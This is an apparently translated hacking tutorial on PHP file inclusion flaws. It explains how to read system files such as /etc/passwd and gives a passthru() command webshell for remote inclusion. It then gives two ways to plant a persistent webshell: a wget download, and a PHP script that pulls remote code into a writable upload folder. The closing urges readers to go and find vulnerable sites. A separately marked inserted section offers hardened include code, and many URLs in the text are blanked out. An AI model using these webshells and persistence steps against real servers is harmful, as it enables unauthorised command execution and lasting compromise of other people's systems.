If empty, execute else and include this file.
3. Why does the vulnerability occur?
You might say this is great: the page is included dynamically according to the URL, and what could be more convenient? So how does that turn into a vulnerability? The answer is that not everyone is well-behaved. Some of us like to do things differently: instead of following the site's own links, we type in the file we want included (called) ourselves. For example, we might enter a URL like this at random: http:///php/?page=. Our program then follows the steps described above: it takes the value of page and passes it to include(). This is where the problem arises. Because that file does not exist, include() emits warnings similar to the following:
Quote:
Warning: include() []: failed to open stream: No such file or directory in /vhost/php/ on line 3
Warning: include() []: Failed opening '' for inclusion (include_path='.:') in /vhost/php/ on line 3
Note that the first Warning says it could not find the file we specified, that is, there is no file at the path we gave; the second Warning follows from the first: because the specified file was not found, the include itself fails and a further warning is issued.
4. How to exploit it
As you can see above, the problem is there. So how do we exploit such a vulnerability? There are many ways, but they are all the same in essence. I will cover three of the more common exploitation methods here:
1. Using the include to read other files on the target machine
As the previous example shows, because the page parameter is not filtered, we can point it at any other sensitive file on the target host. For example, the warning above exposes the absolute path (vhost/php/), so we can probe and include other files repeatedly, for instance by specifying the URL http:///php/?page=./ to read files under the current directory, or using ../ to jump between directories (when ../ is not filtered); we can also give an absolute path to read sensitive system files directly, for example http:///php/?page=/etc/passwd . If the target host has no strict permission restrictions, or Apache runs with relatively high privileges, the contents of this file can be read. Otherwise you will get a Warning similar to: open_basedir restriction in effect.
2. Including runnable PHP *s
If "allow_url_fopen" is enabled on the target host (it is enabled by default, and few people change it), we have even more room. We can point the include at a webshell containing PHP code hosted at some other URL and have it run directly. For example, I will first write a small piece of PHP code that runs a command (commented, so you should be able to follow it) and save it as follows (the file suffix does not matter, as long as the content is PHP).
CODE:
--------------------------------------------------------------------------------
<?php
if (get_magic_quotes_gpc()) {
    $_REQUEST["cmd"] = stripslashes($_REQUEST["cmd"]); // Remove escaping (strip the backslashes magic_quotes added)
}
ini_set("max_execution_time", 0); // Execution time limit for this script; 0 means unlimited
echo "\n"; // Print a start-of-output marker line
passthru($_REQUEST["cmd"]); // Run the command given in cmd
echo "\n"; // Print an end-of-output marker line
?>
The file above accepts the command given in cmd, calls the passthru function to execute it, and returns the output between the two marker lines. Save this file on a server of our own (it need not support PHP), as long as it is reachable over HTTP, for example at the address http://// . Then we can construct the following URL on the vulnerable host to exploit it: http:////php/?page=https:///?cmd=ls , where cmd is the command you want to run. Other commonly used commands (taking *UNIX as an example) are as follows:
Quote:
ll           lists directories and files (equivalent to dir under Windows)
pwd          shows the current absolute path
id, whoami   show the current user
wget         downloads the file at the given URL
And so on; you can search Baidu for the rest, so I will not list them here.
The above method gives us a Webshell (although the PHP file is not on the target machine, it is a Webshell all the same, isn't it? Haha)
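A defensive counterpart to methods 1 and 2 above, added here and not part of the original article: the unfiltered include() the article describes, beside two hardened forms. The pages directory, the ALLOWED_PAGES map and the file names in it are assumptions.

```php
<?php
// Added example (not from the original article): the unfiltered include the article
// describes, beside two hardened forms. "pages", ALLOWED_PAGES and the file names are assumptions.
declare(strict_types=1);

// Vulnerable: the request value reaches include() untouched, so "../../etc/passwd",
// "/etc/passwd" and (where remote includes are enabled) "http://host/x.txt" are all honoured.
function includePageVulnerable(string $page): void
{
    include $page;
}

// Hardened form 1: a fixed allow-list. The request value is only ever a key; the file
// name that reaches include() is one we wrote ourselves.
const ALLOWED_PAGES = ['home' => 'home.php', 'contact' => 'contact.php'];

function resolveAllowListed(string $page): ?string
{
    return ALLOWED_PAGES[$page] ?? null;
}

// Hardened form 2, when the page set is not fixed: confine the path to one directory.
// The pattern rejects "/", ".." and "://" outright; realpath() resolves symlinks and
// returns false for anything not on disk (http:// and php:// wrappers are not paths);
// the prefix check guarantees the resolved file lives under $baseDir.
function resolveConfined(string $page, string $baseDir): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]+\.php\z/', $page)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $page);
    if ($base === false || $real === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Front-controller usage: unknown or out-of-tree pages get a 404 rather than a PHP
// Warning that leaks the absolute path, as the Warning lines quoted above do.
$target = resolveConfined($_GET['page'] ?? 'home.php', __DIR__ . '/pages');
if ($target === null) {
    http_response_code(404);
    exit;
}
include $target;
```

On current PHP a remote include() additionally requires allow_url_include=On, a directive separate from allow_url_fopen and Off by default since PHP 5.2. The open_basedir setting that produced the "restriction in effect" warning mentioned above is a further server-side limit worth setting alongside the code fix.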
3. Including a PHP file that creates a file
Perhaps some people feel more reassured with a real Webshell on the target machine: if one day the inclusion vulnerability is fixed, we can no longer remotely include the "pseudo" Webshell above, right? I understand that mentality, so let's continue. To get a real Webshell, we again discuss two common methods:
1) Use a command such as wget to download a Webshell
This is relatively simple and also very common. In the pseudo webshell we obtained above we can execute commands, so we can call on a very powerful character in the system, wget. You can google what this command can do, and it will certainly leave you dizzy. Haha, we don't need anything that complicated; using -O (--output-document=FILE, write the document to FILE) is enough, haha.
The premise is that you follow the previous steps and place a Webshell containing PHP code somewhere reachable over HTTP or FTP, such as http:///, with the Webshell's content written in that file. Then, in the pseudo Webshell obtained earlier, we request the following URL: https:///php/?page=https:///?cmd=wget https:/// -O . If the current directory is writable, we get a Webshell. If it is not writable, we need to think of other methods.
2) Create the file with a PHP script
The wget approach above can run into a current directory that is not writable, or a target host where the command is disabled (or not installed), and then we need to adapt again. We can combine this with the file inclusion vulnerability from before to include a PHP script that creates (writes) a file. Its content is as follows:
CODE:
--------------------------------------------------------------------------------
<?php
$f = file_get_contents("https:///"); // Read the file at the given URL into a string
$ff = fopen("./upload/", "a");       // Open (creating it if needed) a file in a usable directory, for appending
fwrite($ff, $f);                     // Write the downloaded content into the created file
fclose($ff);                         // Close and save the file
?>
This still writes the same PHP file we downloaded with wget above, but the method is improved and implemented as a PHP script. You can use the ?cmd=ll above to find a writable directory, such as upload here, and then create the file in that directory: ./upload/. Then we have our Webshell.
5. Closing remarks
In fact we could end the topic here. Finally, a few words. File inclusion vulnerabilities are basically simple but carry a high risk. They still exist in many systems, and if you are careful you can find many of them. The exploitation process is fairly flexible; you must be good at analysing problems and finding solutions, and you will make progress step by step.
There is a lot of knowledge involved in this vulnerability and I cannot cover it all one by one. If something is unclear, please ask, or look it up on Google yourself. Time is short, and I hope everyone will correct any inappropriate descriptions!
Finally, things like this need plenty of practice. When I have time I will find a specific example to walk through this process so that everyone can get a deeper understanding. You can also look for one now and see what vulnerabilities you find. I hope you will share your more detailed analysis and exploitation process here! Wishing you progress.